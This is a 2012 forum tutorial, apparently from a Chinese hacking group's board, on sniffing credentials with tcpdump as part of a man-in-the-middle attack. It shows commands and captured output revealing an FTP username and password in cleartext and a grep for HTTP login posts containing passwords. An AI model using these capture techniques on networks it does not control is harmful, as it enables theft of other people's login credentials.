切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
35 : 中间人攻击 tcpdump 进阶嗅探[复制链接]
发表于 2012-8-9 00:02:01 | 显示全部楼层 |!read_mode!
查看网卡:
  1. root@Dis9Team:~# tcpdump -D
  2. 1.eth0
  3. 2.usbmon1 (USB bus number 1)
  4. 3.usbmon2 (USB bus number 2)
  5. 4.any (Pseudo-device that captures on all interfaces)
  6. 5.lo
  7. root@Dis9Team:~#
复制代码
指定网卡嗅探 并且分析数据包
  1. root@Dis9Team:~# tcpdump -i eth0 -c 3 arp
复制代码
制定IP和端口协议 我在5.5.5.130操作:ftp brk.dis9.com 看看大家现在能找到数据了吗? -A的意思是ASCII
  1. root@Dis9Team:~# tcpdump -A -i eth0 tcp and src 5.5.5.130 and port 21
  2. tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
  3. listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
  4. 06:42:52.338012 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [S], seq 2684785620, win 64240, options [mss 1460,nop,nop,sackOK], length 0
  5. E..0.c@...S......G..............p...............
  6. 06:42:53.393140 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [.], ack 1305639100, win 64240, length 0
  7. E..(.d@...S......G..........M.x.P.............
  8. 06:42:54.251161 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [.], ack 249, win 63992, length 0
  9. E..(.e@...S......G..........M.y.P.............
  10. 06:42:59.706404 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [P.], seq 0:10, ack 249, win 63992, length 10
  11. E..2.f@...S......G..........M.y.P....-..USER brk

  12. 06:43:00.822040 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [.], ack 279, win 63962, length 0
  13. E..(.g@...S......G..........M.y.P.............
  14. 06:43:02.765904 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [P.], seq 10:23, ack 279, win 63962, length 13
  15. E..5.h@...S......G..........M.y.P....b..PASS 123456

  16. 06:43:08.968601 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [.], ack 299, win 63942, length 0
  17. E..(.l@...S......G..........M.y.P.............
复制代码
对于HTTP端口的嗅探 网页内容很多 我们可以这样: grep password
  1. root@Dis9Team:~# tcpdump -A -i eth0 tcp and src 5.5.5.130 and port 80 | grep password
  2. tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
  3. listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
  4. formhash=61b0c24b&referer=http%3A%2F%2Fwww.dis9.com%2F&loginfield=username&username=admin&password=b02b2a939e6e57036426a33be3336ef0&questionid=0&answer=&loginsubmit=%B5%C7%C2%BC
复制代码


首先你要分析网页的提交表单 例如:


<form><input id="user_password" type="password"/></form>

附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-23 14:31

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部